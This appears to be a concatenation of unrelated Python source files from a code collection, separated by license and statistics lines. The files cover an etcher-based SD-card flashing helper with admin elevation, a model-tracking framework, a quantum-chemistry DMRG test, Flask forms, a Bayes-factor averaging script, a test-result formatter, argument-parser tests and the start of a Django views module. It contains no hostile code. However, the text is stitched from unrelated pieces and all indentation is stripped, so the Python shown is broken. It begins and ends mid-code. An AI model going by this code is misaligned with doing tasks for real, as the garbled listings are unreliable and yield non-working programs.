si = None
cf = 0
return {"startupinfo": si, "creationflags": cf}
def subprocess_pretty_call(
cmd, logger, stdin=None, check=False, decode=False, as_admin=False
):
""" flexible subprocess helper running separately and using the logger
cmd: the command to be run
logger: the logger to send debug output to
stdin: pipe input into the command
check: whether it should raise on non-zero return code
decode: whether it should decode output (bytes) into UTF-8 str
as_admin: whether the command should be run as root/admin """
if as_admin:
if sys.platform == "win32":
if logger is not None:
logger.std("Call (as admin): " + str(cmd))
return run_as_win_admin(cmd, logger)
from_cli = logger is None or type(logger) == CLILogger
cmd = get_admin_command(cmd, from_gui=not from_cli, logger=logger)
# We should use subprocess.run but it is not available in python3.4
process = subprocess.Popen(
cmd,
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
**startup_info_args()
)
if logger is not None:
logger.std("Call: " + str(process.args))
process.wait()
lines = (
[l.decode("utf-8", "ignore") for l in process.stdout.readlines()]
if decode
else process.stdout.readlines()
)
if logger is not None:
for line in lines:
logger.raw_std(line if decode else line.decode("utf-8", "ignore"))
if check:
if process.returncode != 0:
raise CheckCallException("Process %s failed" % process.args)
return lines
return process.returncode, lines
def subprocess_pretty_check_call(cmd, logger, stdin=None, as_admin=False):
return subprocess_pretty_call(
cmd=cmd, logger=logger, stdin=stdin, check=True, as_admin=as_admin
)
def subprocess_timed_output(cmd, logger, timeout=10):
logger.std("Getting output of " + str(cmd))
return subprocess.check_output(
cmd, universal_newlines=True, timeout=timeout
).splitlines()
def subprocess_external(cmd, logger):
""" spawn a new process without capturing nor watching it """
logger.std("Opening: " + str(cmd))
subprocess.Popen(cmd)
def is_admin():
""" whether current process is ran as Windows Admin or unix root """
if sys.platform == "win32":
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except Exception:
return False
return os.getuid() == 0
def run_as_win_admin(command, logger):
""" run specified command with admin rights """
params = " ".join(['"{}"'.format(x) for x in command[1:]]).strip()
rc = ctypes.windll.shell32.ShellExecuteW(None, "runas", command[0], params, None, 1)
# ShellExecuteW returns 5 if user chose not to elevate
if rc == 5:
raise PermissionError()
return rc
def get_admin_command(command, from_gui, logger, log_to=None):
""" updated command to run it as root on macos or linux
from_gui: whether called via GUI. Using cli sudo if not """
if not from_gui:
return ["sudo"] + command
if sys.platform == "darwin":
# write command to a separate temp bash script
script = (
"#!/bin/bash\n\n{command} 2>&1 {redir}\n\n"
'if [ $? -eq 1 ]; then\n echo "!!! echer returned 1" {redir}\n'
" exit 11\nfi\n\n".format(
command=" ".join([shlex.quote(cmd) for cmd in command]),
redir=">>{}".format(log_to) if log_to else "",
)
)
# add script content to logger
logger.raw_std(script)
with tempfile.NamedTemporaryFile(mode="w", suffix=".sh", delete=False) as fd:
fd.write(script)
fd.seek(0)
return [
"/usr/bin/osascript",
"-e",
'do shell script "/bin/bash {command}" '
"with administrator privileges".format(command=fd.name),
]
if sys.platform == "linux":
return ["pkexec"] + command
class EtcherWriterThread(threading.Thread):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._should_stop = False # stop flag
self.exp = None # exception to be re-raised by caller
def stop(self):
self._should_stop = True
@classmethod
def show_log(cls, logger, log_to_file, log_file, process, eof=False):
if log_to_file:
try:
with open(log_file.name, "r") as f:
lines = f.readlines()
if len(lines) >= 2:
lines.pop()
# working
if "Validating" in lines[-1] or "Flashing" in lines[-1]:
logger.std(lines[-1].replace("\x1b[1A", "").strip())
elif "[1A" in lines[-1]: # still working but between progress
logger.std(lines[-2].replace("\x1b[1A", "").strip())
else: # probably at end of file
for line in lines[-5:]:
logger.std(line.replace("\x1b[1A", "").strip())
except Exception as exp:
logger.err("Failed to read etcher log output: {}".format(exp))
if not log_to_file or eof:
for line in process.stdout:
logger.raw_std(line.decode("utf-8", "ignore"))
def run(self,):
image_fpath, device_fpath, logger = self._args
logger.step("Copy image to sd card using etcher-cli")
from_cli = logger is None or type(logger) == CLILogger
cmd, log_to_file, log_file = get_etcher_command(
image_fpath, device_fpath, logger, from_cli
)
process = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, **startup_info_args()
)
logger.std("Starting Etcher: " + str(process.args))
# intervals in second
sleep_interval = 2
log_interval = 60
counter = 0
while process.poll() is None:
counter += 1
if self._should_stop: # on cancel
logger.std(". cancelling...")
break
time.sleep(sleep_interval)
# increment sleep counter until we reach log interval
if counter < log_interval // sleep_interval:
counter += 1
continue
# reset counter and display log
counter = 0
self.show_log(logger, log_to_file, log_file, process)
try:
logger.std(". has process exited?")
process.wait(timeout=2)
except subprocess.TimeoutExpired:
logger.std(". process exited")
# send ctrl^c
if sys.platform == "win32":
logger.std(". sending ctrl^C")
process.send_signal(signal.CTRL_C_EVENT)
process.send_signal(signal.CTRL_BREAK_EVENT)
time.sleep(2)
if process.poll() is None:
logger.std(". sending SIGTERM")
process.terminate() # send SIGTERM
time.sleep(2)
if process.poll() is None:
logger.std(". sending SIGKILL")
process.kill() # send SIGKILL (SIGTERM again on windows)
time.sleep(2)
else:
logger.std(". process exited")
if not process.returncode == 0:
self.exp = CheckCallException(
"Process returned {}".format(process.returncode)
)
# capture last output
self.show_log(logger, log_to_file, log_file, process, eof=True)
if log_to_file:
log_file.close()
try:
os.unlink(log_file.name)
except Exception as exp:
logger.err(str(exp))
logger.std(". process done")
logger.progress(1)
def prevent_sleep(logger):
if sys.platform == "win32":
logger.std("Setting ES_SYSTEM_REQUIRED mode to current thread")
ctypes.windll.kernel32.SetThreadExecutionState(
WINDOWS_SLEEP_FLAGS["ES_CONTINUOUS"]
| WINDOWS_SLEEP_FLAGS["ES_SYSTEM_REQUIRED"]
| WINDOWS_SLEEP_FLAGS["ES_DISPLAY_REQUIRED"]
)
return
if sys.platform == "linux":
def make_unmapped_window(wm_name):
from Xlib import display
screen = display.Display().screen()
window = screen.root.create_window(0, 0, 1, 1, 0, screen.root_depth)
window.set_wm_name(wm_name)
window.set_wm_protocols([])
return window
logger.std("Suspending xdg-screensaver")
wid = None
try:
# Create window to use with xdg-screensaver
window = make_unmapped_window("caffeinate")
wid = hex(window.id)
cmd = ["/usr/bin/xdg-screensaver", "suspend", wid]
logger.std("Calling {}".format(cmd))
p = subprocess.Popen(" ".join(cmd), shell=True)
p.wait()
if not p.returncode == 0:
raise OSError("xdg-screensaver returned {}".format(p.returncode))
except Exception as exp:
logger.err("Unable to disable sleep. Please do it manually.")
return wid
if sys.platform == "darwin":
cmd = ["/usr/bin/caffeinate", "-dsi"]
logger.std("Calling {}".format(cmd))
process = subprocess.Popen(cmd, **startup_info_args())
return process
def restore_sleep_policy(reference, logger):
if sys.platform == "win32":
logger.std("Restoring ES_CONTINUOUS mode to current thread")
ctypes.windll.kernel32.SetThreadExecutionState(
WINDOWS_SLEEP_FLAGS["ES_CONTINUOUS"]
)
return
if sys.platform == "linux":
logger.std("Resuming xdg-screensaver (wid #{})".format(reference))
if reference is not None:
subprocess_pretty_call(
["/usr/bin/xdg-screensaver", "resume", reference], logger
)
return
if sys.platform == "darwin":
logger.std("Stopping caffeinate process #{}".format(reference.pid))
reference.kill()
reference.wait(5)
return
def get_etcher_command(image_fpath, device_fpath, logger, from_cli):
# on macOS, GUI sudo captures stdout so we use a log file
log_to_file = not from_cli and sys.platform == "darwin"
if log_to_file:
log_file = tempfile.NamedTemporaryFile(
suffix=".log", delete=False, encoding="utf-8"
)
else:
log_file = None
cmd = [
os.path.join(
data.data_dir,
"etcher-cli",
"etcher" if sys.platform == "win32" else "balena-etcher",
),
"-c",
"-y",
"-u",
"-d",
device_fpath,
image_fpath,
]
# handle sudo or GUI alternative for linux and macOS
if sys.platform in ("linux", "darwin"):
cmd = get_admin_command(
cmd,
from_gui=not from_cli,
logger=logger,
log_to=log_file.name if log_to_file else None,
)
return cmd, log_to_file, log_file
def flash_image_with_etcher(image_fpath, device_fpath, retcode, from_cli=False):
""" flash an image onto SD-card
use only with small image as there is no output capture on OSX
and it is not really cancellable.
retcode is a multiprocessing.Value """
logger = CLILogger()
cmd, log_to_file, log_file = get_etcher_command(
image_fpath, device_fpath, logger, from_cli
)
returncode, _ = subprocess_pretty_call(cmd, check=False, logger=logger)
retcode.value = returncode
if log_to_file:
try:
subprocess_pretty_call(["/bin/cat", log_file.name], logger, decode=True)
log_file.close()
os.unlink(log_file.name)
except Exception as exp:
logger.err(str(exp))
return returncode == 0
def sd_has_single_partition(sd_card, logger):
""" whether sd_card consists of a single partition (expected to be clean) """
try:
if sys.platform == "darwin":
disk_prefix = re.sub(r"\/dev\/disk([0-9]+)", r"disk\1s", sd_card)
lines = subprocess_timed_output(["diskutil", "list", sd_card], logger)
nb_partitions = len(
[
line.strip().rsplit(" ", 1)[-1].replace(disk_prefix, "").strip()
for line in lines
if disk_prefix in line
]
)
return nb_partitions == 1
elif sys.platform == "win32":
disk_prefix = re.sub(
r".+PHYSICALDRIVE([0-9+])", r"Disk #\1, Partition #", sd_card
)
lines = subprocess_timed_output(["wmic", "partition"], logger)
nb_partitions = len(
[
re.sub(r".+" + disk_prefix + r"([0-9]+).+", r"\1", line)
for line in lines
if disk_prefix in line
]
)
return nb_partitions == 1
elif sys.platform == "linux":
disk_prefix = re.sub(r"\/dev\/([a-z0-9]+)", r"─\1", sd_card)
lines = subprocess_timed_output(["/bin/lsblk", sd_card], logger)
nb_partitions = len(
[
line.strip().split(" ", 1)[0].replace(disk_prefix, "").strip()
for line in lines
if disk_prefix in line
]
)
return nb_partitions == 1
except Exception as exp:
logger.err(str(exp))
return False
| gpl-3.0 | 3,680,295,156,000,532,500 | 32.764192 | 88 | 0.563696 | false | 4.003106 | false | false | false |
Brett777/Predict-Churn | model_management/datascience_framework.py | 1 | 8515 | import os
import io
import sys
import dill
import copy
from datetime import datetime
from .evaluator import Evaluator
from .utils import (
post_to_platform,
get_current_notebook,
strip_output,
get_current_notebook,
mkdir_p,
)
class DataScienceFramework(object):
def __init__(
self,
model,
problem_class,
x_test,
y_test,
name=None,
description=None,
evaluator=Evaluator,
):
# assign variables to class
self.name = name
self.description = description
self.model = model
self.problem_class = problem_class
self.y_test = list(y_test)
self.x_test = list(x_test)
self.framework = model.__module__.split(".")[0]
# get environment data
self._meta_data = self.meta_data()
self.y_pred = self.predict()
# initialize evaluator
self.evaluator = Evaluator(self.problem_class)
# class methods
@classmethod
def load(cls, model_id):
# use hard coded string to load for now
with open(".model_cache/sklearn_model_cache.pkl", "rb") as file:
instance = dill.load(file)
instance.model = instance.parse_model(io.BytesIO(instance.model_serialized))
return instance
@classmethod
def project_models(cls):
query = """
query($service_name: String!) {
runnableInstance(serviceName: $service_name) {
runnable {
project {
name
models {
edges {
node {
id
name
description
problemClass
framework
objectClass
language
languageVersion
createdAt
updatedAt
rank
hyperParameters
structure
author {
fullName
}
metrics {
edges {
node {
key
value
}
}
}
diagnostics {
edges {
node {
... on ModelDiagnosticROC {
title
falsePositiveRates
truePositiveRates
thresholds
}
... on ModelDiagnosticResidual {
title
observations
residuals
}
... on ModelDiagnosticConfusionMatrix {
title
matrix
}
}
}
}
parameters {
edges {
node {
key
value
confidenceInterval {
positive
negative
}
}
}
}
}
}
}
}
}
}
}
"""
response = post_to_platform(
{"query": query, "variables": {"service_name": os.environ["SERVICE_NAME"]}}
)
response_data = response.json()["data"]
models = list(
map(
lambda edge: edge["node"],
response_data["runnableInstance"]["runnable"]["project"]["models"][
"edges"
],
)
)
return models
# framework dependent functions
def predict(self):
""" Make prediction based on x_test """
raise NotImplementedError
def framework_version(self):
""" Return version of the framework been used. """
raise NotImplementedError
def object_class(self):
""" Return name of the model object. """
raise NotImplementedError
def parameter(self):
""" Get parameter from model. """
raise NotImplementedError
def hyperparameter(self):
""" Get hyper parameter from model. """
raise NotImplementedError
def serialize_model(self):
""" Default methods for serialize model. """
return dill.dumps(self.model)
def parse_model(self, model_file):
""" Default methods for reading in model. """
return dill.load(model_file)
# base framework functions
def meta_data(self):
""" Capture environment meta data. """
meta_data_obj = {
"name": self.name,
"description": self.description,
"framework": self.framework,
"createdAt": datetime.now().isoformat(),
"sessionName": os.environ["SERVICE_NAME"],
"language": "python",
"languageVersion": ".".join(map(str, sys.version_info[0:3])),
}
return meta_data_obj
def diagnostics(self):
""" Return diagnostics of model. """
return [fn(self.y_test, self.y_pred) for fn in self.evaluator.diagnostics]
def metrics(self):
""" Return evaluation of model performance. """
return [fn(self.y_test, self.y_pred) for fn in self.evaluator.metrics]
def summary(self):
""" Return all infomation that will be stored. """
model_meta = {
"diagnostics": self.diagnostics(),
"metrics": self.metrics(),
"parameters": self.parameter(),
"frameworkVersion": self.framework_version(),
"hyperParameters": self.hyperparameter(),
"problemClass": self.problem_class,
"objectClass": self.object_class(),
}
model_meta.update(self._meta_data)
return model_meta
def save(self):
""" Save all information to platform. """
self.model_serialized = self.serialize_model()
# save model object locally for now
#mkdir_p(".model_cache")
#with open(".model_cache/sklearn_model_cache.pkl", "w") as file:
# dill.dump(self, file)
model_meta = self.summary()
model_meta.update(
{
"data": {"y_pred": list(self.y_pred), "y_test": list(self.y_test)},
"notebook": get_current_notebook(),
}
)
query = """
mutation($input: CreateModelInput!) {
createModel(input: $input) {
clientMutationId
}
}
"""
return post_to_platform({"query": query, "variables": {"input": model_meta}})
| mit | -343,225,543,429,373,700 | 34.92827 | 91 | 0.376864 | false | 6.416729 | true | false | false |
SebWouters/CheMPS2 | PyCheMPS2/tests/test12.py | 1 | 3497 | #
# CheMPS2: a spin-adapted implementation of DMRG for ab initio quantum chemistry
# Copyright (C) 2013-2018 Sebastian Wouters
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
import numpy as np
import sys
import PyCheMPS2
import ctypes
# Set the seed of the random number generator and cout.precision
Initializer = PyCheMPS2.PyInitialize()
Initializer.Init()
#######################
### BCS Hamiltonian ###
#######################
eps = np.array([ -3.5, -2.5, -1.5, -0.5, 0.5, 1.5, 2.5, 3.5 ], dtype=ctypes.c_double)
L = len( eps )
g = -1.0
power = 0.0
Nelec = L # Number of fermions in the model = Number of single-particle states
TwoS = 0 # Twice the total spin
Irrep = 0 # No point group is used, Irrep should ALWAYS be zero.
'''
Model: h_ij = delta_ij eps[i]
v_ijkl = delta_ij delta_kl g ( eps[i] * eps[k] ) ^ {power}
h_ijkl = v_ijkl + ( delta_ik h_jl + delta_jl h_ik ) / ( N - 1 )
Ham = 0.5 sum_ijkl h_ijkl sum_sigma,tau a^+_{i,sigma} a^+_{j,tau} a_{l,tau} a_{k,sigma}
'''
# The Hamiltonian initializes all its matrix elements to 0.0
orbirreps = np.zeros( [ L ], dtype=ctypes.c_int )
group = 0
Ham = PyCheMPS2.PyHamiltonian( L, group, orbirreps )
# Setting up the Problem
Prob = PyCheMPS2.PyProblem( Ham, TwoS, Nelec, Irrep )
# Setting up the ConvergenceScheme
# setInstruction(instruction, D, Econst, maxSweeps, noisePrefactor)
OptScheme = PyCheMPS2.PyConvergenceScheme( 2 )
OptScheme.setInstruction( 0, 100, 1e-10, 10, 0.5 )
OptScheme.setInstruction( 1, 1000, 1e-10, 10, 0.0 )
# Run ground state calculation
theDMRG = PyCheMPS2.PyDMRG( Prob, OptScheme )
###############################################################################################
### Hack: overwrite the matrix elements with 4-fold symmetry directly in the Problem object ###
###############################################################################################
for orb1 in range( L ):
for orb2 in range( L ):
eri = g * ( abs( eps[ orb1 ] * eps[ orb2 ] )**power )
oei = ( eps[ orb1 ] + eps[ orb2 ] ) / ( Nelec - 1 )
if ( orb1 == orb2 ):
Prob.setMxElement( orb1, orb1, orb2, orb2, eri + oei )
else:
Prob.setMxElement( orb1, orb1, orb2, orb2, eri )
Prob.setMxElement( orb1, orb2, orb1, orb2, oei )
theDMRG.PreSolve() # New matrix elements require reconstruction of complementary renormalized operators
Energy = theDMRG.Solve()
theDMRG.calc2DMandCorrelations()
theDMRG.printCorrelations()
# Clean-up
# theDMRG.deleteStoredMPS()
theDMRG.deleteStoredOperators()
del theDMRG
del OptScheme
del Prob
del Ham
del Initializer
# Check whether the test succeeded
if ( np.fabs( Energy + 25.5134137600604 ) < 1e-8 ):
print("================> Did test 12 succeed : yes")
else:
print("================> Did test 12 succeed : no")
| gpl-2.0 | -2,050,985,702,913,222,700 | 35.427083 | 103 | 0.635402 | false | 3.070237 | false | false | false |
jinjiaho/project57 | forms.py | 1 | 3372 | from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed, FileRequired
from wtforms import StringField, PasswordField, SubmitField, RadioField, validators, IntegerField, SelectField, BooleanField,DecimalField
from wtforms.validators import DataRequired, Email, Length
from flaskext.mysql import MySQL
class AddUserForm(FlaskForm):
name = StringField('Full Name', validators=[DataRequired("Please enter the name of the newcomer.")])
username= StringField('Username', validators=[DataRequired("Please enter a username.")])
role = RadioField('Role of User')
password = PasswordField('Password', validators=[DataRequired("Please enter a password."), Length(min=6, message="Passwords must be 6 characters or more.")])
submit = SubmitField('Add User')
class CreateNewItem(FlaskForm):
itemname = StringField('Item Name', validators=[DataRequired("Please enter the name of the new item.")])
category = StringField('Category of Item', validators = [DataRequired()])
price = DecimalField('Unit Price', places=4, rounding=None, validators = [DataRequired()])
reorderpt = IntegerField('Reorder Point', validators = [DataRequired()])
count_unit = SelectField('Unit for Withdrawal', validators = [DataRequired()], choices=[("carton", "carton"), ("pc", "pc"), ("kg", "kg"), ("tin", "tin"), ("box", "box"), ("unit", "unit"), ("packet", "packet")])
order_unit = SelectField('Unit for Receiving', validators = [DataRequired()], choices=[("carton", "carton"), ("pc", "pc"), ("kg", "kg"), ("tin", "tin"), ("box", "box"), ("unit", "unit")])
order_multiplier = DecimalField('Item Quantity', places=4, rounding=None, validators = [DataRequired()])
submitTwo = SubmitField('Add New Item')
class ExistingItemsLocation(FlaskForm):
itemname = StringField('Item Name', validators=[DataRequired("Please insert the name of the item")])
tid = SelectField('Tag', coerce=int) # Value is tid
qty = IntegerField('Available Amount', validators = [DataRequired()])
submitFour = SubmitField('Assign To Tag')
class TransferItem(FlaskForm):
iname = StringField('Item Name')
tagOld = SelectField('Old Tag', coerce=int) # Value is tid
tagNew = SelectField('New Tag', coerce=int) # Value is tid
qty = IntegerField('Qty to Transfer', [validators.Optional()])
submit = SubmitField()
class LoginForm(FlaskForm):
username = StringField(validators=[DataRequired("Please enter a username")])
password = PasswordField(validators=[DataRequired('Please enter a password')])
remember = BooleanField()
submit = SubmitField()
class RetrievalForm(FlaskForm):
amount = StringField('Input the Amount Taken', validators=[validators.input_required()])
submit4 = SubmitField("Enter Quantity")
class AddNewLocation(FlaskForm):
tname = StringField('Name of New Tag', validators=[DataRequired("Please enter the name of the tag without spaces.")])
location = SelectField('Select Storeroom')
newLocation = StringField('Add a New Storeroom')
remarks = StringField('Remarks (optional)')
submitThree = SubmitField("Enter")
class TrackingForm(FlaskForm):
enabled = RadioField('Track Item Quantity? ', choices=[('yes','Yes'),('no','No')])
password = PasswordField(validators=[DataRequired('Please enter a password')])
remember = BooleanField()
submit = SubmitField()
class RemoveItem(FlaskForm):
iname = StringField('Item Name')
submit = SubmitField("Delete Item")
| mit | 4,052,969,891,147,546,600 | 49.328358 | 211 | 0.733393 | false | 3.844926 | false | false | false |
kristohr/pybayenv2 | pybayenv/compute_average_bf.py | 1 | 4066 | #!/usr/bin/python
import sys, string, re, os, commands, time, math
#from scipy import stats
#import scipy as sp
import numpy as np
#import matplotlib as mpl
#from matplotlib import pyplot as plt
class SNP:
def __init__(self, name, num_env, t):
self.name = name
self.num_env = [False] * num_env
self.bf_list = [[0 for i in range(t)] for j in range(num_env)]
self.rel_signal = []
self.sum_signals = 0
self.lg_info = []
self.chr = 99
self.lg = 99
def get_name(self):
return self.name
def get_num_env(self):
return self.num_env
def set_num_env(self, n):
self.num_env[n] = True
def add_to_list(self, bf, k, i):
self.bf_list[k][i] = bf
def set_signal(self, gamma):
self.rel_signal.append(gamma)
self.sum_signals += gamma #Add to the total of signals
#Return the bf signal in variable k
def get_signal(self, k):
return self.rel_signal[k]
#Return the bf signal list
def get_signals(self):
return self.rel_signal
def get_sum_signals(self):
return self.sum_signals
def print_env(self):
print self.num_env
def get_median_bf(self, k):
#print self.bf_list[k]
bfs = np.array(self.bf_list[k])
median = np.median(bfs)
return median
def get_avg_bf(self, k):
#print self.bf_list[k]
bfs = np.array(self.bf_list[k])
avg = np.average(bfs)
return avg
def add_bf(self, bf):
self.sum_bf += bf
def get_sum_bf(self):
return self.sum_bf
def get_num_runs(self):
return self.num_runs
def get_bf_list(self):
return self.bf_list
def get_bf_list(self):
return self.bf_list
def set_lg_info(self, info):
self.lg_info.append(info)
def get_lg_info(self):
return self.lg_info
def set_chr(self, ch):
self.chr = ch
def get_chr(self):
return self.chr
def set_linkage_group(self, lg):
self.lg = lg
def get_linkage_group(self):
return self.lg
def compute_average_bf(num_var, num_tests):
N = int(num_var)
t = int(num_tests)
snp_dict = {}
for i in range (0, t):
filename = "results/bf_results_t" + str(i) + ".bf"
data = open( filename, "r")
print filename
lines = data.readlines()
for line in lines:
cols = line.split("\t")
snp_name = cols[0][0:-2]
if i > 9:
snp_name = snp_name[0:-1]
if snp_name in snp_dict:
snp = snp_dict[snp_name]
for k in range(0, N):
snp.add_to_list(float(cols[k+1]), k, i)
else:
snp = SNP(snp_name, N, t)
snp_dict[snp_name] = snp
for k in range(0, N):
snp.add_to_list(float(cols[k+1]), k, i)
data.close()
print "################LENGTH:" + str(len(snp_dict))
FILE1 = open("results/median_bf.txt", "w")
FILE2 = open("results/average_bf.txt", "w")
#bf_median = "marker\tsal1\tsal2\ttemp1\ttemp2\tox1\tox2\n"
#bf_avg = "marker\tsal1\tsal2\ttemp1\ttemp2\tox1\tox2\n"
bf_median = ""
bf_avg = ""
for key in snp_dict:
snp = snp_dict[key]
bf_avg += snp.get_name()
bf_median += snp.get_name()
for k in range(0, N):
bf_a = snp.get_avg_bf(k)
bf_m = snp.get_median_bf(k)
bf_avg += "\t" + str(bf_a)
bf_median += "\t" + str(bf_m)
bf_avg += "\n"
bf_median += "\n"
FILE1.write(bf_median)
FILE2.write(bf_avg)
FILE1.close()
FILE2.close()
if __name__ == '__main__':
# Terminate if too few arguments
if len(sys.argv) < 3:
print 'usage: %s <number of vars> <num tests>' % sys.argv[0]
sys.exit(-1)
main(sys.argv[1], sys.argv[2])
| bsd-3-clause | 8,263,703,149,634,889,000 | 23.792683 | 70 | 0.512789 | false | 3.118098 | false | false | false |
thenakliman/nirikshak | nirikshak/post_task/console.py | 1 | 2103 | # Copyright 2017 <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from nirikshak.common import plugins
from nirikshak.post_task import base
LOG = logging.getLogger(__name__)
@plugins.register('console')
class FormatOutputConsole(base.FormatOutput):
@staticmethod
def _get_jaanch_result(jaanch_parameter):
if 'result' in jaanch_parameter['output']:
if str(jaanch_parameter['output']['result']) == \
str(jaanch_parameter['input']['result']):
return 'pass'
return 'fail'
return jaanch_parameter['input']['result']
def format_output(self, **kwargs):
jaanch_name = list(kwargs.keys())[0]
jaanch_parameter = kwargs[jaanch_name]
input_parameter = ''
for key, value in jaanch_parameter['input']['args'].items():
input_parameter = ("%s%s:%s," % (input_parameter, key, value))
jaanch_result = self._get_jaanch_result(jaanch_parameter)
jaanch_type = jaanch_parameter['type']
jaanch_name_type_param = ("%s,%s,%s" % (jaanch_name,
jaanch_type,
input_parameter))
separator = '.' * (120 - len(jaanch_name_type_param))
formatted_output = ("%s%s%s" % (jaanch_name_type_param, separator,
jaanch_result))
jaanch_parameter['formatted_output'] = formatted_output
LOG.info("%s output has been formatted for console", formatted_output)
return kwargs
| apache-2.0 | 6,413,825,219,913,676,000 | 39.442308 | 78 | 0.622444 | false | 3.809783 | false | false | false |
matematik7/STM | tests/test_parser.py | 1 | 6119 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------
# tests/test_parser.py
#
# Test input arguments parser
# ----------------------------------------------------------------
# copyright (c) 2015 - Domen Ipavec
# Distributed under The MIT License, see LICENSE
# ----------------------------------------------------------------
from unittest import TestCase
import argparse, sys
from stm.configuration import Configuration
from stm.parser import Parser
# change argument parser to print to stdout
class ArgumentParser(argparse.ArgumentParser):
def error(self, message):
self.print_help(sys.stdout)
print('%s: error: %s\n' % (self.prog, message))
exit()
class Test_parser(TestCase):
def setUp(self):
self.parser = Parser()
def tearDown(self):
self.parser = None
def getConf(self, arguments):
return self.parser.getConfiguration(arguments.split(), ArgumentParser)
def assertInvalid(self, input):
with self.assertRaises(SystemExit):
self.getConf(input)
def test_empty(self):
self.assertInvalid('')
def test_direct(self):
conf = self.getConf('--input test.png test2.png --prefix pref --postfix post --folder fol')
self.assertItemsEqual(conf.input, ['test.png', 'test2.png'])
self.assertEqual(conf.name_prefix, 'pref')
self.assertEqual(conf.name_postfix, 'post')
self.assertEqual(conf.folder, 'fol')
def test_output(self):
self.assertInvalid('--input test.png test2.png --output test.png')
self.assertInvalid('--input . --output test.png')
conf = self.getConf('--input test.png --output test.png')
self.assertEqual(conf.output, 'test.png')
def test_recursive(self):
conf = self.getConf('--input test.png --recursive')
self.assertTrue(conf.recursive)
conf = self.getConf('--input test.png')
self.assertFalse(conf.recursive)
def test_debug(self):
conf = self.getConf('--input test.png --debug')
self.assertTrue(conf.debug)
conf = self.getConf('--input test.png')
self.assertFalse(conf.debug)
def test_verbose(self):
conf = self.getConf('--input test.png --verbose')
self.assertTrue(conf.verbose)
conf = self.getConf('--input test.png')
self.assertFalse(conf.verbose)
def test_file_format(self):
conf = self.getConf('--input test.png --fileFormat jpg')
self.assertEqual(conf.fileFormat, 'jpg')
self.assertInvalid('--input test.png --fileFormat krn')
def test_size(self):
conf = self.getConf('--input test.png --size 123x456')
self.assertEqual(conf.size, [123, 456])
self.assertInvalid('--input test.png --size 0x2')
self.assertInvalid('--input test.png --size -12x2')
self.assertInvalid('--input test.png --size 123')
self.assertInvalid('--input test.png --size 12x12x12')
self.assertInvalid('--input test.png --size xxx')
def test_mode(self):
conf = self.getConf('--input test.png --scale')
self.assertEqual(conf.cropMode, 'none')
conf = self.getConf('--input test.png --padd')
self.assertEqual(conf.cropMode, 'padd')
conf = self.getConf('--input test.png --crop')
self.assertEqual(conf.cropMode, 'crop')
conf = self.getConf('--input test.png --smart')
self.assertEqual(conf.cropMode, 'smart')
conf = self.getConf('--input test.png')
self.assertEqual(conf.cropMode, 'smart')
self.assertInvalid('--input test.png --scale --padd')
self.assertInvalid('--input test.png --padd --crop')
self.assertInvalid('--input test.png --crop --featured a')
self.assertInvalid('--input test.png --featured a --smart')
self.assertInvalid('--input test.png --smart --scale')
def test_mode_featured(self):
conf = self.getConf('--input test.png --featured 100x30,-15x30')
self.assertEqual(conf.featured, ([100,30], [-15, 30]))
self.assertInvalid('--input test.png --featured xxx,xxx')
self.assertInvalid('--input test.png --featured 10x10x10,15x30')
self.assertInvalid('--input test.png --featured 10x10,10x10,10x10')
self.assertInvalid('--input test.png --featured 10x10')
self.assertInvalid('--input test.png --featured 10,10x10')
def test_padd_color(self):
conf = self.getConf('--input test.png --padd --paddColor 0,100,200,250')
self.assertEqual(conf.paddColor, [0,100,200,250])
conf = self.getConf('--input test.png --paddColor 0,100,200')
self.assertEqual(conf.paddColor, [0,100,200,255])
self.assertInvalid('--input test.png --padd --paddColor 0')
self.assertInvalid('--input test.png --padd --paddColor 0,100')
self.assertInvalid('--input test.png --padd --paddColor 0,100,100,100,100')
self.assertInvalid('--input test.png --padd --paddColor -1,100,100')
self.assertInvalid('--input test.png --padd --paddColor 256,100,100')
def test_zoominess(self):
conf = self.getConf('--input test.png --zoominess 10')
self.assertEqual(conf.zoominess, 10)
conf = self.getConf('--input test.png --zoominess 0')
self.assertEqual(conf.zoominess, 0)
self.assertInvalid('--input test.png --zoominess 101')
self.assertInvalid('--input test.png --zoominess -1')
self.assertInvalid('--input test.png --zoominess 45 --padd')
self.assertInvalid('--input test.png --zoominess 45 --crop')
self.assertInvalid('--input test.png --zoominess 45 --scale')
def test_allowPadd(self):
conf = self.getConf('--input test.png --allowPadd')
self.assertTrue(conf.allowPadd)
conf = self.getConf('--input test.png')
self.assertFalse(conf.allowPadd)
| mit | -2,415,367,671,543,004,000 | 37.484277 | 99 | 0.594868 | false | 3.919923 | true | false | false |
ciudadanointeligente/write-it | nuntium/user_section/views.py | 1 | 24845 | import requests
from django.contrib.auth.decorators import login_required
from subdomains.utils import reverse
from django.http import HttpResponse, Http404
from django.shortcuts import get_object_or_404
from django.utils.decorators import method_decorator
from django.views.generic import TemplateView, CreateView, DetailView, View, ListView, RedirectView
from django.views.generic.edit import UpdateView, DeleteView, FormView
from mailit.forms import MailitTemplateForm
from instance.models import WriteItInstance, WriteItInstanceConfig, WriteitInstancePopitInstanceRecord
from ..models import Message,\
NewAnswerNotificationTemplate, ConfirmationTemplate, \
Answer, Moderation, \
AnswerWebHook
from .forms import WriteItInstanceBasicForm, \
NewAnswerNotificationTemplateForm, ConfirmationTemplateForm, \
